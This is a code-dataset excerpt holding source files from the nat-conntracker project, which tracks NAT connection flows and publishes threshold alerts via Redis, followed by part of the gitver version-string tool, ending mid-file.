"text": "import json\nimport time\n\nimport redis\n\n__all__ = ['RedisSyncer']\n\n\nclass RedisSyncer(object):\n def __init__(self, logger, channel, conn_url='redis://localhost:6379/0'):\n self._logger = logger\n self._channel = channel\n self._conn = redis.from_url(conn_url)\n\n def pub(self, threshold, src, dst, count):\n return self._conn.publish(\n self._channel,\n json.dumps({\n 'threshold': threshold,\n 'src': src,\n 'dst': dst,\n 'count': count\n }))\n\n def sub(self, interval=0.01, is_done=None):\n is_done = is_done if is_done is not None else lambda: False\n psconn = self._conn.pubsub(ignore_subscribe_messages=True)\n psconn.subscribe(**{self._channel: self._handle_message})\n while True:\n psconn.get_message()\n if is_done():\n break\n time.sleep(interval)\n\n def _handle_message(self, message):\n if message['type'] != 'message':\n return\n\n try:\n msg = json.loads(message['data'].decode('utf-8'))\n self._logger.warn(\n ('over threshold={threshold} src={src} dst={dst} '\n 'count={count} source=sync').format(**msg))\n except Exception:\n self._logger.exception('failed to handle message')\n\n def ping(self):\n return self._conn.ping()\n"
},
{
"alpha_fraction": 0.5302897095680237,
"alphanum_fraction": 0.5513608455657959,
"avg_line_length": 25.488372802734375,
"blob_id": "48a9a0d6317b0920ff65269283449a192b4b47bc",
"content_id": "679ce925836d3cc34ddd5adfdd43a418a83920dd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1139,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 43,
"path": "/setup.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import codecs\nimport os\nimport sys\n\nfrom setuptools import setup\n\n_HERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n with codecs.open(os.path.join(_HERE, *parts), 'r') as fp:\n return fp.read()\n\n\ndef main():\n setup(\n name='nat-conntracker',\n description='Conntrack XML eating NAT thing',\n long_description=read('README.rst'),\n author='Travis CI GmbH',\n author_email='[email protected]',\n license='MIT',\n url='https://github.com/travis-ci/nat-conntracker',\n use_scm_version=True,\n packages=['nat_conntracker'],\n setup_requires=['pytest-runner>=4.0', 'setuptools_scm>=1.15'],\n install_requires=['cachetools>=2.0', 'redis>=2.10'],\n tests_require=[\n 'codecov>=2.0', 'pytest-cov>=2.0', 'pytest-runner>=4.0',\n 'pytest>=3.4', 'yapf>=0.22'\n ],\n entry_points={\n 'console_scripts':\n ['nat-conntracker=nat_conntracker.__main__:main']\n },\n platforms=['any'],\n zip_safe=False,\n python_requires='>=3.5')\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.4521072804927826,
"alphanum_fraction": 0.4636015295982361,
"avg_line_length": 13.5,
"blob_id": "4377cb074b589f615299490a3c00d087a2736690",
"content_id": "0d4414bea1fa4841bdd386fd9aa79b17b15a4263",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 261,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 18,
"path": "/nat_conntracker/null_syncer.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import time\n\n__all__ = ['NullSyncer']\n\n\nclass NullSyncer(object):\n def __init__(self, *_, **__):\n pass\n\n def pub(self, *_):\n return 1\n\n def sub(self, **__):\n while True:\n time.sleep(10)\n\n def ping(self):\n pass\n"
},
{
"alpha_fraction": 0.624454140663147,
"alphanum_fraction": 0.6266375780105591,
"avg_line_length": 20.809524536132812,
"blob_id": "7527955b46b166f4cae60997a242b161fcc894ba",
"content_id": "4ae0b139b8c0029d1e437eb7d9f9a3490dc8cc9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 916,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 42,
"path": "/conftest.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import os\nimport socket\nimport sys\n\nimport pytest\nimport redis\n\nsys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))\n\n\[email protected](autouse=True)\ndef no_socket_gethostbyaddr(monkeypatch):\n monkeypatch.setattr(socket, 'gethostbyaddr', lambda a: 'somehost')\n\n\[email protected](autouse=True)\ndef no_redis_from_url(monkeypatch):\n monkeypatch.setattr(redis, 'from_url', lambda u: FakeRedisConn(u))\n\n\nclass FakeRedisConn(object):\n def __init__(self, url):\n self.url = url\n self._sets = {}\n\n def publish(self, *args):\n pass\n\n def pubsub(self, **kwargs):\n pass\n\n def ping(self):\n return b'PONG'\n\n def smembers(self, key):\n return self._sets.get(key, [])\n\n def sadd(self, key, value):\n if not key in self._sets:\n self._sets[key] = set()\n self._sets[key].add(str(value).encode('utf-8'))\n return len(self._sets[key])\n"
},
{
"alpha_fraction": 0.6951871514320374,
"alphanum_fraction": 0.7005347609519958,
"avg_line_length": 22.375,
"blob_id": "587d7848da0cff0f193d903bcef560a93a4f4280",
"content_id": "4b67fe0b29c145fa096b2b49d705384230c4869b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 187,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 8,
"path": "/tests/stats_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from nat_conntracker.stats import Stats\n\n\ndef test_stats_init():\n stats = Stats()\n assert stats.max_size > 0\n assert stats.counter is not None\n assert stats.index is not None\n"
},
{
"alpha_fraction": 0.5014727711677551,
"alphanum_fraction": 0.5036818981170654,
"avg_line_length": 30.581396102905273,
"blob_id": "7c0ac4f2f5e71e0117610b61cd3c3a49868f5b44",
"content_id": "d83c9541a806d1b17a43eb5ca71055b157b3f542",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2716,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 86,
"path": "/nat_conntracker/runner.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import signal\nimport time\n\nfrom threading import Thread\n\n__all__ = ['Runner']\n\n\nclass Runner(object):\n def __init__(self, conntracker, syncer, logger, **args):\n self._conntracker = conntracker\n self._syncer = syncer\n self._logger = logger\n self._args = args\n self._done = False\n self._handle_thread = None\n self._sub_thread = None\n\n def run(self):\n self._start_threads()\n\n try:\n signal.signal(signal.SIGUSR1, self._conntracker.dump_state)\n self._logger.info('entering sample loop '\n 'threshold={} top_n={} eval_interval={}'.format(\n self._args['conn_threshold'],\n self._args['top_n'],\n self._args['eval_interval']))\n self._run_sample_loop()\n except KeyboardInterrupt:\n self._logger.warn('interrupt')\n finally:\n signal.signal(signal.SIGUSR1, signal.SIG_IGN)\n self._logger.info('cleaning up')\n self._done = True\n self._conntracker.sample(self._args['conn_threshold'],\n self._args['top_n'])\n self._conntracker.cleanup()\n self._join()\n\n def _run_sample_loop(self):\n while True:\n self._conntracker.sample(self._args['conn_threshold'],\n self._args['top_n'])\n nextloop = time.time() + self._args['eval_interval']\n while time.time() < nextloop:\n self._join()\n if not self._is_alive():\n self._done = True\n return\n if self._is_done():\n return\n time.sleep(0.1)\n\n def _start_threads(self):\n self._handle_thread = Thread(target=self._handle)\n self._handle_thread.start()\n\n self._sub_thread = Thread(target=self._sub)\n self._sub_thread.daemon = True\n self._sub_thread.start()\n\n def _join(self):\n self._handle_thread.join(0.1)\n\n def _is_alive(self):\n return self._handle_thread.is_alive()\n\n def _is_done(self):\n return self._done\n\n def _handle(self):\n try:\n self._conntracker.handle(\n self._args['events'], is_done=self._is_done)\n except Exception:\n self._logger.exception('breaking out of handle wrap')\n finally:\n self._done = True\n\n def _sub(self):\n try:\n self._syncer.sub(is_done=self._is_done)\n except Exception:\n self._logger.exception('breaking out of sub wrap')\n self._done = True\n"
},
{
"alpha_fraction": 0.7224669456481934,
"alphanum_fraction": 0.7268722653388977,
"avg_line_length": 21.700000762939453,
"blob_id": "2b0e963dae187556fbb3c1a8a9882d65e42eb948",
"content_id": "f8e97d41d314ca00e230b0aa4b00b6528970505c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 227,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 10,
"path": "/Dockerfile",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "FROM python:3-alpine\n\nWORKDIR /app\n\nCOPY . .\nRUN pip install --no-cache-dir -r deploy-requirements.txt\n\nENV PATH /bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/app/bin\nENV PYTHONPATH /app\nCMD [\"nat-conntracker\"]\n"
},
{
"alpha_fraction": 0.5479345321655273,
"alphanum_fraction": 0.5526110529899597,
"avg_line_length": 33.67567443847656,
"blob_id": "0680b16c9da59e12a3a1e8cd07c242b408e838bc",
"content_id": "d4a87ed304e4c6ba037373e4c9c2df2b9be6146d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3849,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 111,
"path": "/nat_conntracker/conntracker.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import socket\n\nfrom ipaddress import ip_address\nfrom threading import Thread\n\nfrom .flow_parser import FlowParser\n\n__all__ = ['Conntracker']\n\n\nclass Conntracker(object):\n def __init__(self, logger, syncer, settings, healther, stats):\n self._logger = logger\n self._syncer = syncer\n self._settings = settings\n self._healther = healther\n self._stats = stats\n\n def handle(self, stream, is_done=None):\n FlowParser(self, self._logger).handle_events(stream, is_done=is_done)\n\n def cleanup(self):\n self._healther.cleanup()\n\n def sample(self, threshold, top_n):\n self._logger.info(f'begin sample threshold={threshold} top_n={top_n}')\n\n flow_count = 0\n for ((src, dst), count) in self._stats.top(n=top_n):\n flow_count += count\n if count >= threshold:\n self._logger.warn(f'over threshold={threshold} src={src} '\n f'dst={dst} count={count} '\n f'hostname={self._lookup_hostname(src)}')\n self._syncer.pub(threshold, src, dst, count)\n\n if flow_count >= self._settings.min_flow():\n self._healther.healthy('flow-count', ttl=300)\n else:\n self._healther.unhealthy('flow-count')\n\n self._stats.reset()\n self._logger.info(f'end sample threshold={threshold} top_n={top_n}')\n\n def handle_flow(self, flow):\n if flow is None:\n return\n\n if flow.flowtype != 'new':\n self._logger.debug(f'skipping flowtype={flow.flowtype}')\n # Only \"new\" flows are currently handled, meaning that any flows\n # of type \"update\" or \"destroy\" are ignored along with any of the\n # state changes they may describe.\n return\n\n (src, dst) = flow.src_dst()\n if src is None or dst is None:\n self._logger.debug('skipping flow without src dst')\n return\n\n src_addr = ip_address(src.host)\n dst_addr = ip_address(dst.host)\n\n for ign in self._settings.dst_ignore():\n if dst_addr in ign:\n self._logger.debug(\n f'ignoring dst match src={src_addr} dst={dst_addr}')\n return\n\n for ign in self._settings.src_ignore():\n if src_addr in ign:\n self._logger.debug(\n f'ignoring src match src={src_addr} dst={dst_addr}')\n return\n\n try:\n self._logger.debug(f'adding src={src_addr} dst={dst_addr}')\n self._stats.add(src, dst)\n except Exception as exc:\n self._logger.error(exc)\n\n def dump_state(self, *_):\n src_ign = self._settings.src_ignore()\n for i, ign in enumerate(sorted(src_ign)):\n self._logger.info(f'src_ign dump {i + 1}/{len(src_ign)} net={ign}')\n\n dst_ign = self._settings.dst_ignore()\n for i, ign in enumerate(sorted(dst_ign)):\n self._logger.info(f'dst_ign dump {i + 1}/{len(dst_ign)} net={ign}')\n\n self._logger.info(f'stats max_size={self._stats.max_size}')\n for i, ((src, dst), count) in enumerate(self._stats.top(10)):\n self._logger.info(\n f'stats dump {i + 1}/10 src={src} dst={dst} count={count}')\n\n def _lookup_hostname(self, ipv4, timeout=0.1):\n ret = {'hostname': 'notset'}\n fetch = Thread(target=self._build_hostname_fetch(ret, ipv4))\n fetch.start()\n fetch.join(timeout)\n return ret['hostname']\n\n def _build_hostname_fetch(self, ret, ipv4):\n def fetch():\n try:\n ret['hostname'] = socket.gethostbyaddr(ipv4)[0]\n except socket.herror:\n ret['hostname'] = 'unknown'\n self._logger.exception('failed to get hostname')\n\n return fetch\n"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.702479362487793,
"avg_line_length": 12.44444465637207,
"blob_id": "f3000613b05fdbf1ebc0b57446638f71488645c5",
"content_id": "9a82eb29e106bef7fe5fa68474c63d200902d7d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 121,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "cachetools>=2.0\nredis>=2.10\n\ncodecov>=2.0\npytest-cov>=2.0\npytest-runner>=4.0\npytest>=3.4\nsetuptools_scm>=1.15\nyapf>=0.22\n"
},
{
"alpha_fraction": 0.7588555812835693,
"alphanum_fraction": 0.7588555812835693,
"avg_line_length": 25.214284896850586,
"blob_id": "0800f53ab486e204cdd5199d04bed0f564e4beeb",
"content_id": "62c11b14fe126c7b3a85e4ff9d8207de4537c165",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 28,
"path": "/tests/conntracker_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport pytest\n\nfrom nat_conntracker.conntracker import Conntracker\nfrom nat_conntracker.flow_parser import Flow\n\n\[email protected]\ndef empty_conntracker():\n return Conntracker(None, None, None, None, None)\n\n\ndef test_conntracker_init(empty_conntracker):\n assert empty_conntracker._settings is None\n assert empty_conntracker._syncer is None\n assert empty_conntracker._logger is None\n assert empty_conntracker._stats is None\n\n\ndef test_conntracker_handle_flow(empty_conntracker):\n empty_conntracker._logger = logging.getLogger()\n\n assert empty_conntracker.handle_flow(None) is None\n\n empty_flow = Flow()\n empty_flow.flowtype = 'new'\n assert empty_conntracker.handle_flow(empty_flow) is None\n"
},
{
"alpha_fraction": 0.5718799233436584,
"alphanum_fraction": 0.5721432566642761,
"avg_line_length": 29.384000778198242,
"blob_id": "7908f9513e2681920e0dbaa433a2d09294e941c2",
"content_id": "db4c2e3c29b3e18f7dc41b7f17f15200d255676f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3798,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 125,
"path": "/nat_conntracker/flow_parser.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from collections import namedtuple\nfrom xml.dom.minidom import parseString as minidom_parse_string\nfrom xml.parsers.expat import ExpatError\n\n__all__ = ['FlowParser']\n\n\nclass FlowParser(object):\n def __init__(self, conntracker, logger):\n self._conntracker = conntracker\n self._logger = logger\n\n def handle_events(self, stream, is_done=None):\n is_done = is_done if is_done is not None else lambda: False\n for line in stream:\n try:\n dom = minidom_parse_string(line)\n for flow_node in dom.getElementsByTagName('flow'):\n self._conntracker.handle_flow(Flow.from_node(flow_node))\n except ExpatError as experr:\n self._logger.debug(f'expat error: {experr}')\n finally:\n self._logger.debug(f'checking is_done={is_done()}')\n if is_done():\n return\n\n\nFlowAddress = namedtuple('FlowAddress', ['host', 'port'])\n\n\nclass FlowMetaGeneric(object):\n def __init__(self):\n self.direction = ''\n\n def __repr__(self):\n return f'<{self.__class__.__name__} direction={repr(self.direction)}>'\n\n @classmethod\n def from_node(cls, meta_node):\n inst = cls()\n inst.direction = meta_node.getAttribute('direction')\n return inst\n\n\nclass FlowMetaOrigReply(object):\n def __init__(self):\n self.direction = ''\n self.src = None\n self.dst = None\n\n def __repr__(self):\n return f'<{self.__class__.__name__} direction={repr(self.direction)} ' \\\n f'src={repr(self.src)} dst={repr(self.dst)}>'\n\n @classmethod\n def from_node(cls, meta_node):\n inst = cls()\n inst.direction = meta_node.getAttribute('direction')\n inst.src = FlowAddress(\n _find_data(meta_node, 'src'), _find_data(meta_node, 'sport'))\n inst.dst = FlowAddress(\n _find_data(meta_node, 'dst'), _find_data(meta_node, 'dport'))\n return inst\n\n\nclass FlowMetaIndependent(object):\n direction = 'independent'\n\n def __init__(self):\n self.id = ''\n self.assured = False\n\n def __repr__(self):\n return f'<{self.__class__.__name__} id={repr(self.id)} ' \\\n f'assured={repr(self.assured)}>'\n\n @classmethod\n def from_node(cls, meta_node):\n inst = cls()\n inst.id = _find_data(meta_node, 'id')\n if len(meta_node.getElementsByTagName('assured')) > 0:\n inst.assured = True\n return inst\n\n\nclass Flow(object):\n def __init__(self):\n self.flowtype = ''\n self.meta = []\n\n def __repr__(self):\n return f'<{self.__class__.__name__} flowtype={repr(self.flowtype)} ' \\\n f'meta={repr(self.meta)}>'\n\n def src_dst(self):\n for meta in self.meta:\n if meta.direction != 'original':\n continue\n if meta.src is not None and meta.dst is not None:\n return (meta.src, meta.dst)\n return (None, None)\n\n @classmethod\n def from_node(cls, flow_node):\n inst = cls()\n inst.flowtype = flow_node.getAttribute('type')\n for meta_node in flow_node.getElementsByTagName('meta'):\n inst.meta.append(cls.meta_from_node(meta_node))\n return inst\n\n @staticmethod\n def meta_from_node(meta_node):\n return {\n 'original': FlowMetaOrigReply,\n 'reply': FlowMetaOrigReply,\n 'independent': FlowMetaIndependent\n }.get(meta_node.getAttribute('direction'),\n FlowMetaGeneric).from_node(meta_node)\n\n\ndef _find_data(node, parent_tag, default=''):\n for subnode in node.getElementsByTagName(parent_tag):\n if subnode.firstChild is not None:\n return subnode.firstChild.data\n return default\n"
},
{
"alpha_fraction": 0.5258215665817261,
"alphanum_fraction": 0.5352112650871277,
"avg_line_length": 13.199999809265137,
"blob_id": "f94a0b3d9a26d6393fcd35f64bb07b40c3c1ff83",
"content_id": "34696bb48250805c092cc63eb2cf56f6a265bc97",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 213,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 15,
"path": "/nat_conntracker/null_healther.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "__all__ = ['NullHealther']\n\n\nclass NullHealther:\n def ping(self):\n pass\n\n def cleanup(self):\n pass\n\n def healthy(self, key, ttl=60):\n pass\n\n def unhealthy(self, key):\n pass\n"
},
{
"alpha_fraction": 0.6589861512184143,
"alphanum_fraction": 0.7296466827392578,
"avg_line_length": 22.25,
"blob_id": "c6f693191535c8d624d742d6eddfa7ebfe00eaeb",
"content_id": "1163dbaf22ccb2747b24e3c2b1fa5d9e293b85a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 651,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 28,
"path": "/tests/redis_settings_test.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from ipaddress import ip_network\n\nimport pytest\n\nfrom nat_conntracker.redis_settings import RedisSettings\n\n\[email protected]\ndef settings():\n return RedisSettings()\n\n\ndef test_redis_settings_init(settings):\n assert settings._conn is not None\n\n\ndef test_redis_settings_ping(settings):\n assert settings.ping() == b'PONG'\n\n\ndef test_redis_settings_src_ignore(settings):\n settings.add_ignore_src('123.145.0.0/16')\n assert ip_network('123.145.0.0/16') in settings.src_ignore()\n\n\ndef test_redis_settings_dst_ignore(settings):\n settings.add_ignore_dst('167.189.0.0/16')\n assert ip_network('167.189.0.0/16') in settings.dst_ignore()\n"
},
{
"alpha_fraction": 0.5357142686843872,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 13,
"blob_id": "6b796865186b5e26771142502f53a65688dac1f9",
"content_id": "b3d12c556255455da4765af0c0f33c866c400be5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 28,
"license_type": "permissive",
"max_line_length": 15,
"num_lines": 2,
"path": "/deploy-requirements.txt",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "cachetools>=2.0\nredis>=2.10\n"
},
{
"alpha_fraction": 0.568236231803894,
"alphanum_fraction": 0.5794094204902649,
"avg_line_length": 26.844444274902344,
"blob_id": "96d8a17ec20b955767c9ee7903dc8183a1234ed9",
"content_id": "3c78776c0046f7f0c685ab1f9835f120b78929e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1253,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 45,
"path": "/nat_conntracker/redis_settings.py",
"repo_name": "travis-ci/nat-conntracker",
"src_encoding": "UTF-8",
"text": "from ipaddress import ip_network\n\nimport redis\nfrom cachetools.func import ttl_cache\n\n__all__ = ['RedisSettings']\n\n\nclass RedisSettings(object):\n def __init__(self,\n namespace='nat-conntracker',\n conn_url='redis://localhost:6379/0'):\n self._namespace = namespace\n self._conn = redis.from_url(conn_url)\n\n def ping(self):\n return self._conn.ping()\n\n @ttl_cache(ttl=30)\n def src_ignore(self):\n return self._get_networks('src-ignore')\n\n @ttl_cache(ttl=30)\n def dst_ignore(self):\n return self._get_networks('dst-ignore')\n\n def add_ignore_src(self, src):\n return self._add_ignore('src-ignore', src)\n\n def add_ignore_dst(self, dst):\n return self._add_ignore('dst-ignore', dst)\n\n @ttl_cache(ttl=30)\n def min_flow(self, default=10):\n return int(self._conn.get(f'{self._namespace}:min-flow') or default)\n\n def _get_networks(self, key):\n return [\n ip_network(s.decode('utf-8'))\n for s in filter(lambda s: s.strip() != b'',\n self._conn.smembers(f'{self._namespace}:{key}'))\n ]\n\n def _add_ignore(self, key, value):\n self._conn.sadd(f'{self._namespace}:{key}', str(value))\n"
}
] | 27 |
nexiles/gitver
|
https://github.com/nexiles/gitver
|
36c4469e84baf000b10b3e35f5aaa9c861a71522
|
143e134280378bd850a2dd9af57700977756699a
|
f9ee481cd25dcf7c5d87c5834fa787c18b675cf5
|
refs/heads/master
| 2021-01-17T10:52:58.781620 | 2014-01-06T13:54:21 | 2014-01-06T13:54:21 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.563979983329773,
"alphanum_fraction": 0.5658014416694641,
"avg_line_length": 37.19130325317383,
"blob_id": "04293d1534c588ddd872256ba1af34e105c045bd",
"content_id": "c05aaa8b94460149569d0a51a7f7961bda99e6c9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4392,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 115,
"path": "/gitver",
"repo_name": "nexiles/gitver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n\n\"\"\"\ngitver - version strings management for humans\nManuel Bua\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n\"\"\"\n\nimport sys\nimport argparse\nfrom config import cfg\nfrom sanity import check_config, check_gitignore, check_project_root\nfrom commands import cmd_build_template, cmd_clean, cmd_cleanall, cmd_info, \\\n cmd_init, cmd_list_next, cmd_list_templates, cmd_next, cmd_version\nfrom termcolors import warn\n\n\ndef main():\n check_project_root()\n\n # inject the default action \"info\" if none specified\n if (len(sys.argv) < 2 or\n len(sys.argv) == 2 and sys.argv[1] == '--ignore-gitignore'):\n sys.argv.append('info')\n\n args = parse_args()\n\n # avoid check if 'init' command\n if not 'init' in sys.argv:\n\n check_config()\n exit_on_error = args.func in [cmd_next, cmd_clean, cmd_cleanall]\n if not args.ignore_gitignore:\n check_gitignore(exit_on_error)\n else:\n print warn(\"(ignoring .gitignore warning)\")\n\n return args.func(args)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--ignore-gitignore',\n help='Ignore the .gitignore warning and continue '\n 'running as normal (specify this flag before '\n 'any other command, at YOUR own risk)',\n dest='ignore_gitignore',\n default=False,\n action='store_true')\n\n sp = parser.add_subparsers(title='Valid commands')\n\n add_command(sp, 'version', \"Show gitver version\", cmd_version)\n add_command(sp, 'init', \"Create gitver's configuration directory\", cmd_init)\n\n add_command(sp, 'info', \"Print version information for this repository \"\n \"[default]\",\n cmd_info)\n\n add_command(sp, 'list-templates', \"Enumerates available templates\",\n cmd_list_templates)\n\n add_command(sp, 'list-next', \"Enumerates NEXT custom strings\",\n cmd_list_next)\n\n p = add_command(sp, 'update', \"Perform simple keyword substitution on the \"\n \"specified template file(s) and place it to \"\n \"the path described by the first line in the \"\n \"template.\", cmd_build_template)\n p.add_argument('templates', default='', type=str)\n\n p = add_command(sp, 'next', \"Sets the NEXT version numbers for the \"\n \"currently reachable last tag. This will \"\n \"suppress the usage of the \\\"-\" +\n cfg['next_suffix'] +\n \"\\\" suffix, enable use of the custom \\\"-\" +\n cfg['next_custom_suffix'] +\n \"\\\" suffix and will use the supplied version \"\n \"numbers instead.\", cmd_next)\n p.add_argument('next_version_numbers', default='', type=str)\n\n p = add_command(sp, 'clean', \"Resets the NEXT custom string for the \"\n \"currently active tag, or the specified tag, \"\n \"to a clean state. Usage of the \\\"-\" +\n cfg['next_suffix'] + \"\\\" suffix is restored.\",\n cmd_clean)\n p.add_argument('tag', nargs='?', type=str, default='')\n\n add_command(sp, 'cleanall', \"Resets all the NEXT custom strings for this\"\n \"repository. 
Usage of the \\\"-\" +\n cfg['next_suffix'] +\n \"\\\" suffix is restored.\", cmd_cleanall)\n return parser.parse_args()\n\n\ndef add_command(parent, name, desc, func):\n p = parent.add_parser(name, help=desc)\n p.set_defaults(func=func)\n return p\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.5571503043174744,
"alphanum_fraction": 0.5610647201538086,
"avg_line_length": 28.821012496948242,
"blob_id": "eaf6cdb6627a49736aad8f60c6771da01c625865",
"content_id": "f76e16075ac41202bb329645e1c4333e4a793716",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7664,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 257,
"path": "/commands.py",
"repo_name": "nexiles/gitver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# coding=utf-8\n\n\"\"\"\nDefines gitver commands\n\"\"\"\n\nimport re\nimport os\nimport sys\nfrom termcolors import *\nfrom git import get_repo_info\nfrom storage import KVStore\nfrom sanity import check_gitignore\nfrom string import Template\nfrom defines import CFGDIR, PRJ_ROOT\nfrom config import cfg\n\n# file where to store NEXT strings <=> TAG user-defined mappings\nNEXT_STORE_FILE = os.path.join(CFGDIR, \".next_store\")\nTPLDIR = os.path.join(CFGDIR, 'templates')\n\nuser_version_matcher = r\"v{0,1}(\\d+)\\.(\\d+)\\.(\\d+)$\"\n\n# try import version information\ntry:\n from version import gitver_version, gitver_buildid\nexcept ImportError:\n gitver_version = 'n/a'\n gitver_buildid = 'n/a'\n\n\ndef template_path(name):\n return os.path.join(TPLDIR, name)\n\n\ndef parse_templates(templates, repo, next_custom):\n for t in templates.split(' '):\n tpath = template_path(t)\n if os.path.exists(tpath):\n with open(tpath, 'r') as fp:\n lines = fp.readlines()\n\n if len(lines) < 2:\n print err(\"The template \" + bold(t) + \" is not valid\")\n return\n\n output = str(lines[0]).strip(' #\\n')\n if not os.path.exists(os.path.dirname(output)):\n print err(\"The template output directory \\\"\" + bold(output) +\n \"\\\"\" + \"doesn't exists.\")\n\n print \"Processing template \\\"\" + bold(t) + \"\\\" for \" + output + \\\n \"...\"\n\n lines = lines[1:]\n\n xformed = Template(\"\".join(lines))\n vstring = build_version_string(repo, next_custom)\n\n # this should NEVER fail\n if not next_custom is None:\n user = user_numbers_from_string(next_custom)\n if not user:\n print err(\"Invalid custom NEXT version numbers detected, \"\n \"this should NEVER happen at this point!\")\n sys.exit(1)\n\n keywords = {\n 'CURRENT_VERSION': vstring,\n 'BUILD_ID': repo['build-id'],\n 'FULL_BUILD_ID': repo['full-build-id'],\n 'MAJOR': repo['maj'] if next_custom is None else int(user[0]),\n 'MINOR': repo['min'] if next_custom is None else int(user[1]),\n 'PATCH': repo['patch'] if next_custom is None else int(user[2]),\n 'COMMIT_COUNT': repo['count']\n }\n\n res = xformed.substitute(keywords)\n\n # resolve relative paths to the project's root\n if not os.path.isabs(output):\n output = os.path.join(PRJ_ROOT, output)\n\n try:\n fp = open(output, 'w')\n fp.write(res)\n fp.close()\n except IOError:\n print err(\"Couldn't write file \\\"\" + output + \"\\\"\")\n\n stat = os.stat(output)\n print \"Done, \" + str(stat.st_size) + \" bytes written.\"\n else:\n print err(\"Couldn't find the \\\"\" + t + \"\\\" template\")\n\n\ndef user_numbers_from_string(user):\n try:\n data = re.match(user_version_matcher, user).groups()\n if len(data) != 3:\n raise AttributeError\n except AttributeError:\n return False\n return data\n\n\ndef build_version_string(repo, next_custom=None):\n in_next = repo['count'] > 0\n if in_next and not next_custom is None and len(next_custom) > 0:\n version = next_custom\n version += \"-\" + cfg['next_custom_suffix']\n else:\n version = \"%d.%d.%d\" % (repo['maj'], repo['min'], repo['patch'])\n if in_next:\n version += \"-\" + cfg['next_suffix']\n\n if in_next:\n version += \"-\" + str(repo['count'])\n\n version += \"/\" + repo['build-id']\n\n return version\n\n\ndef cmd_version(args):\n print \"This is gitver \" + bold(gitver_version)\n print \"Full build ID is \" + bold(gitver_buildid)\n\n\ndef cmd_init(args):\n i = 0\n\n if not 